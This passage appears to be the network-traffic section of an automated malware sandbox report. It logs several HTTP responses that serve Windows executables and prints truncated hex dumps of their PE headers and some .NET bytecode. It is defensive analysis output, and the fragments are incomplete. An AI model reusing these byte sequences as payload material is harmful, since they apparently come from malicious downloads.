00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:11 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:12 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:12 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:13 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 28 May 2023 08:43:16 GMTContent-Type: application/octet-streamContent-Length: 5129728Last-Modified: Fri, 26 May 2023 16:27:32 GMTConnection: keep-aliveETag: "6470ddf4-4e4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 dd 70 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 4e 00 00 08 00 00 00 00 00 00 9e 5a 4e 00 00 20 00 00 00 60 4e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 5a 4e 00 4b 00 00 00 00 60 4e 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3a 4e 00 00 20 00 00 00 3c 4e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 60 4e 00 00 06 00 00 00 3e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 4e 00 00 02 00 00 00 44 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5a 4e 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 44 4e 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a 1d 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:17 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
